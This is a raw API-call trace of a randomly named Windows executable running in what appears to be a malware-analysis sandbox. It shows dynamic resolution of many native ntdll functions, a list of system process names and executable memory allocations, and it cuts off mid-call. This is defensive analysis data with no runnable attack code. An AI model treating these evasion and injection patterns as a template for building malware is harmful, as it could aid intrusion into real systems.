[0048.067] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0048.067] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.067] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0048.067] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.067] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0048.067] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0048.067] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0048.248] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.249] GetProcAddress (hModule=0x77c40000, lpProcName="ZwClose") returned 0x77c5f9d0 [0048.249] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.249] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateFile") returned 0x77c600a4 [0048.249] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.249] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenFile") returned 0x77c5fd54 [0048.249] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.249] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateSection") returned 0x77c5ff94 [0048.249] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.249] GetProcAddress (hModule=0x77c40000, lpProcName="ZwMapViewOfSection") returned 0x77c5fc40 [0048.249] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.249] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnmapViewOfSection") returned 0x77c5fc70 [0048.250] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.250] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x0 [0048.250] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.250] GetProcAddress (hModule=0x77c40000, lpProcName="ZwReadFile") returned 0x77c5f8e0 [0048.250] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.250] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryInformationFile") returned 0x77c5fa00 [0048.250] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.250] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetInformationFile") returned 0x77c5fc28 [0048.250] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.250] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryAttributesFile") returned 0x77c5fe4c [0048.250] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.250] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQuerySection") returned 0x77c60040 [0048.251] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.251] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryFullAttributesFile") returned 0x77c6132c [0048.251] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.251] GetProcAddress (hModule=0x77c40000, lpProcName="ZwWriteFile") returned 0x77c5f918 [0048.251] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.251] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeviceIoControlFile") returned 0x77c5f8fc [0048.251] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.252] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryObject") returned 0x77c5f9e8 [0048.252] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.252] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryDirectoryFile") returned 0x77c5fd88 [0048.252] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.253] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenSection") returned 0x77c5fdb8 [0048.253] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.253] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDuplicateObject") returned 0x77c5fe34 [0048.253] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.253] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeleteFile") returned 0x77c609d4 [0048.253] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.253] GetProcAddress (hModule=0x77c40000, lpProcName="ZwLockFile") returned 0x77c60e44 [0048.253] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.253] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnlockFile") returned 0x77c61ea8 [0048.253] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.253] GetProcAddress (hModule=0x77c40000, lpProcName="ZwTerminateProcess") returned 0x77c5fca0 [0048.254] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.254] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryVolumeInformationFile") returned 0x77c5ff7c [0048.254] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.254] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetVolumeInformationFile") returned 0x77c61c8c [0048.254] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.254] GetProcAddress (hModule=0x77c40000, lpProcName="ZwAccessCheck") returned 0x77c60218 [0048.254] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.254] GetProcAddress (hModule=0x77c40000, lpProcName="ZwExtendSection") returned 0x77c60b0c [0048.254] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.254] GetProcAddress (hModule=0x77c40000, lpProcName="ZwFlushBuffersFile") returned 0x77c5ffac [0048.254] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.254] GetProcAddress (hModule=0x77c40000, lpProcName="ZwFsControlFile") returned 0x77c5fde8 [0048.255] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.255] GetProcAddress (hModule=0x77c40000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x77c60f48 [0048.255] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.255] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQuerySecurityObject") returned 0x77c61518 [0048.255] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.255] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetSecurityObject") returned 0x77c61b8c [0048.255] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.255] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateProcess") returned 0x77c60804 [0048.255] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.255] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateProcessEx") returned 0x77c5ffdc [0048.255] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.255] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateUserProcess") returned 0x77c6090c [0048.256] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.256] GetProcAddress (hModule=0x77c40000, lpProcName="ZwResumeThread") returned 0x77c60058 [0048.256] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.256] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateThread") returned 0x77c5fff4 [0048.256] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.256] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryInformationProcess") returned 0x77c5fac8 [0048.256] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.256] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenKey") returned 0x77c5fa18 [0048.256] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.256] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenKeyEx") returned 0x77c61008 [0048.256] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.257] GetProcAddress (hModule=0x77c40000, lpProcName="ZwEnumerateValueKey") returned 0x77c5fa30 [0048.257] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.257] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryKey") returned 0x77c5fa80 [0048.257] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.257] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryValueKey") returned 0x77c5fa98 [0048.257] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.257] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateKey") returned 0x77c5fb30 [0048.257] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.257] GetProcAddress (hModule=0x77c40000, lpProcName="ZwEnumerateKey") returned 0x77c5fd3c [0048.257] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.257] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetValueKey") returned 0x77c601b4 [0048.257] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.258] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeleteKey") returned 0x77c609ec [0048.258] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.258] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeleteValueKey") returned 0x77c60a34 [0048.258] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.258] GetProcAddress (hModule=0x77c40000, lpProcName="ZwFlushKey") returned 0x77c60b70 [0048.258] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.258] GetProcAddress (hModule=0x77c40000, lpProcName="ZwLoadKey") returned 0x77c60dfc [0048.258] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.258] GetProcAddress (hModule=0x77c40000, lpProcName="ZwLoadKey2") returned 0x77c60e14 [0048.258] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.258] GetProcAddress (hModule=0x77c40000, lpProcName="ZwNotifyChangeKey") returned 0x77c60f60 [0048.259] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.259] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryMultipleValueKey") returned 0x77c6146c [0048.259] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.259] GetProcAddress (hModule=0x77c40000, lpProcName="ZwReplaceKey") returned 0x77c61738 [0048.259] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.259] GetProcAddress (hModule=0x77c40000, lpProcName="ZwRestoreKey") returned 0x77c617d0 [0048.259] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.259] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSaveKey") returned 0x77c61864 [0048.259] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.259] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetInformationKey") returned 0x77c61a48 [0048.259] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0048.259] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnloadKey") returned 0x77c61e60 [0048.316] SysReAllocStringLen (in: pbstr=0x14f08dc*=0x0, psz="tcpsvcs.exe", len=0xb | out: pbstr=0x14f08dc*="tcpsvcs.exe") returned 1 [0048.317] SysReAllocStringLen (in: pbstr=0x14f08d8*=0x0, psz="ntvdm.exe", len=0x9 | out: pbstr=0x14f08d8*="ntvdm.exe") returned 1 [0048.317] SysReAllocStringLen (in: pbstr=0x14f08d4*=0x0, psz="dllhost.exe", len=0xb | out: pbstr=0x14f08d4*="dllhost.exe") returned 1 [0048.317] SysReAllocStringLen (in: pbstr=0x14f08d0*=0x0, psz="replace.exe", len=0xb | out: pbstr=0x14f08d0*="replace.exe") returned 1 [0048.317] SysReAllocStringLen (in: pbstr=0x14f08cc*=0x0, psz="regsvr32.exe", len=0xc | out: pbstr=0x14f08cc*="regsvr32.exe") returned 1 [0048.317] SysReAllocStringLen (in: pbstr=0x14f08c8*=0x0, psz="winver.exe", len=0xa | out: pbstr=0x14f08c8*="winver.exe") returned 1 [0048.317] SysReAllocStringLen (in: pbstr=0x14f08c4*=0x0, psz="help.exe", len=0x8 | out: pbstr=0x14f08c4*="help.exe") returned 1 [0048.317] SysReAllocStringLen (in: pbstr=0x14f08c0*=0x0, psz="find.exe", len=0x8 | out: pbstr=0x14f08c0*="find.exe") returned 1 [0048.317] SysReAllocStringLen (in: pbstr=0x14f08bc*=0x0, psz="compact.exe", len=0xb | out: pbstr=0x14f08bc*="compact.exe") returned 1 [0048.317] SysReAllocStringLen (in: pbstr=0x14f08b8*=0x0, psz="chkdsk.exe", len=0xa | out: pbstr=0x14f08b8*="chkdsk.exe") returned 1 [0048.317] SysReAllocStringLen (in: pbstr=0x14f08b4*=0x0, psz="attrib.exe", len=0xa | out: pbstr=0x14f08b4*="attrib.exe") returned 1 [0048.317] SysReAllocStringLen (in: pbstr=0x14f08b0*=0x0, psz="write.exe", len=0x9 | out: pbstr=0x14f08b0*="write.exe") returned 1 [0048.317] SysReAllocStringLen (in: pbstr=0x14f08ac*=0x0, psz="hh.exe", len=0x6 | out: pbstr=0x14f08ac*="hh.exe") returned 1 [0048.317] QueryPerformanceCounter (in: lpPerformanceCount=0x41f7cc | out: lpPerformanceCount=0x41f7cc*=16849769256) returned 1 [0048.600] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x10f0000 [0048.697] RtlAllocateHeap (HeapHandle=0x10f0000, Flags=0x0, Size=0x10000) returned 0x10f0590 [0048.697] RtlAllocateHeap (HeapHandle=0x10f0000, Flags=0x0, Size=0x10000) returned 0x1100598 [0048.697] RtlAllocateHeap (HeapHandle=0x10f0000, Flags=0x0, Size=0x10000) returned 0x11105a0 [0048.697] RtlAllocateHeap (HeapHandle=0x10f0000, Flags=0x0, Size=0x10000) returned 0x11205a8 [0048.697] RtlAllocateHeap (HeapHandle=0x10f0000, Flags=0x0, Size=0x10000) returned 0x11305b0 [0048.697] RtlAllocateHeap (HeapHandle=0x10f0000, Flags=0x0, Size=0x10000) returned 0x11405b8 [0048.697] RtlAllocateHeap (HeapHandle=0x10f0000, Flags=0x0, Size=0x10000) returned 0x11505c0 [0048.697] RtlAllocateHeap (HeapHandle=0x10f0000, Flags=0x0, Size=0x10000) returned 0x11605c8 [0048.778] GetDC (hWnd=0x0) returned 0x440109d2 [0048.778] GetDeviceCaps (hdc=0x440109d2, index=12) returned 32 [0048.778] GetDeviceCaps (hdc=0x440109d2, index=14) returned 1 [0048.778] ReleaseDC (hWnd=0x0, hDC=0x440109d2) returned 1 [0048.778] LoadStringA (in: hInstance=0x13ce000, uID=0xfeea, lpBuffer=0x41f3b0, cchBufferMax=1024 | out: lpBuffer="JPEG Image File") returned 0xf [0048.805] LoadStringA (in: hInstance=0x13ce000, uID=0xff43, lpBuffer=0x41f350, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9 [0048.805] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3 [0048.805] LoadStringA (in: hInstance=0x13ce000, uID=0xff44, lpBuffer=0x41f350, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12 [0048.806] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3 [0048.806] LoadStringA (in: hInstance=0x13ce000, uID=0xff45, lpBuffer=0x41f350, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5 [0048.806] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0048.806] LoadStringA (in: hInstance=0x13ce000, uID=0xff46, lpBuffer=0x41f350, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7 [0048.806] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3 [0048.806] CharLowerBuffA (in: lpsz="jpeg", cchLength=0x4 | out: lpsz="jpeg") returned 0x4 [0048.807] LoadStringA (in: hInstance=0x13ce000, uID=0xfeea, lpBuffer=0x41f3b0, cchBufferMax=1024 | out: lpBuffer="JPEG Image File") returned 0xf [0048.807] CharLowerBuffA (in: lpsz="jpg", cchLength=0x3 | out: lpsz="jpg") returned 0x3 [0048.890] CharLowerBuffA (in: lpsz="PNG", cchLength=0x3 | out: lpsz="png") returned 0x3 [0049.067] VirtualAlloc (lpAddress=0xae4000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0xae4000 [0049.208] GetModuleFileNameW (in: hModule=0x13c0000, lpFilename=0x6db88c, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe")) returned 0x3a [0049.208] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", nBufferLength=0x104, lpBuffer=0x41f3e4, lpFilePart=0x41f3e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", lpFilePart=0x41f3e0*="WAQro5oWEZAnSlij.exe") returned 0x3a [0049.209] SysReAllocStringLen (in: pbstr=0xae27ac*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0xae27ac*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0049.236] SysReAllocStringLen (in: pbstr=0x41f6c8*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0x41f6c8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0049.287] GetThreadLocale () returned 0x409 [0049.287] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0049.417] GetThreadLocale () returned 0x409 [0049.417] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0049.417] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", lpFilePart=0x41f390*="WAQro5oWEZAnSlij.exe") returned 0x3a [0049.417] SysReAllocStringLen (in: pbstr=0x41f6c8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0x41f6c8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0049.417] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0x41f5c0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0049.434] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", cchLength=0x3a | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe") returned 0x3a [0049.434] SysReAllocStringLen (in: pbstr=0x41f6c8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe", len=0x3a | out: pbstr=0x41f6c8*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe") returned 1 [0049.434] SysReAllocStringLen (in: pbstr=0xae27ac*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe", len=0x3a | out: pbstr=0xae27ac*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe") returned 1 [0049.434] SysReAllocStringLen (in: pbstr=0xae27bc*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0xae27bc*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0049.434] SysReAllocStringLen (in: pbstr=0x41f6bc*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0x41f6bc*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0049.434] SysReAllocStringLen (in: pbstr=0x41f6c0*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0x41f6c0*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0049.434] GetThreadLocale () returned 0x409 [0049.434] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0049.434] GetThreadLocale () returned 0x409 [0049.434] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0049.434] GetFullPathNameW (in: lpFileName="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", lpFilePart=0x41f390*=0x0) returned 0x26 [0049.434] SysReAllocStringLen (in: pbstr=0x41f6c0*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0x41f6c0*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0049.435] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0x41f5c0*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0049.435] CharLowerBuffW (in: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", cchLength=0x26 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 0x26 [0049.435] SysReAllocStringLen (in: pbstr=0x41f6c0*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0x41f6c0*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0049.435] SysReAllocStringLen (in: pbstr=0xae27bc*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0xae27bc*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0049.435] VirtualAlloc (lpAddress=0xaf4000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0xaf4000 [0049.436] GetSystemDirectoryW (in: lpBuffer=0xaf1db4, uSize=0xfffe | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.437] SysReAllocStringLen (in: pbstr=0x41f6b4*=0x0, psz="C:\\Windows\\system32", len=0x13 | out: pbstr=0x41f6b4*="C:\\Windows\\system32") returned 1 [0049.437] SysReAllocStringLen (in: pbstr=0x41f6b8*=0x0, psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x41f6b8*="C:\\Windows\\system32\\") returned 1 [0049.437] GetThreadLocale () returned 0x409 [0049.437] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0049.437] GetThreadLocale () returned 0x409 [0049.437] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0049.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\Windows\\system32\\", lpFilePart=0x41f390*=0x0) returned 0x14 [0049.437] SysReAllocStringLen (in: pbstr=0x41f6b8*="C:\\Windows\\system32\\", psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x41f6b8*="C:\\Windows\\system32\\") returned 1 [0049.437] SysReAllocStringLen (in: pbstr=0x41f5c0*=0x0, psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x41f5c0*="C:\\Windows\\system32\\") returned 1 [0049.437] CharLowerBuffW (in: lpsz="C:\\Windows\\system32\\", cchLength=0x14 | out: lpsz="c:\\windows\\system32\\") returned 0x14 [0049.437] SysReAllocStringLen (in: pbstr=0x41f6b8*="C:\\Windows\\system32\\", psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0x41f6b8*="c:\\windows\\system32\\") returned 1 [0049.437] SysReAllocStringLen (in: pbstr=0xae27b8*=0x0, psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0xae27b8*="c:\\windows\\system32\\") returned 1 [0049.437] GetTempPathW (in: nBufferLength=0xfffe, lpBuffer=0xaf1db4 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0049.437] SysReAllocStringLen (in: pbstr=0x41f6a8*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x41f6a8*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 1 [0049.437] SysReAllocStringLen (in: pbstr=0x41f6ac*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x41f6ac*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 1 [0049.437] GetThreadLocale () returned 0x409 [0049.437] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0049.437] GetThreadLocale () returned 0x409 [0049.437] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0049.438] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", nBufferLength=0x104, lpBuffer=0x41f394, lpFilePart=0x41f390 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpFilePart=0x41f390*=0x0) returned 0x25 [0049.438] SysReAllocStringLen (in: pbstr=0x41f6ac*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x41f6ac*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 1 [0049.438] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", nBufferLength=0x104, lpBuffer=0x41f0dc, lpFilePart=0x41f0d8 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpFilePart=0x41f0d8*=0x0) returned 0x25 [0049.438] SysReAllocStringLen (in: pbstr=0x41f31c*=0x0, psz="C:", len=0x2 | out: pbstr=0x41f31c*="C:") returned 1 [0049.438] SysReAllocStringLen (in: pbstr=0x41f2d8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x41f2d8*="C:\\") returned 1 [0049.438] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0049.438] SysReAllocStringLen (in: pbstr=0x41f2d4*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x41f2d4*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 1 [0049.438] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrg~1\\appdata\\local\\temp\\") returned 0x25 [0049.438] SetLastError (dwErrCode=0x0) [0049.438] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\appdata\\local\\temp\\", 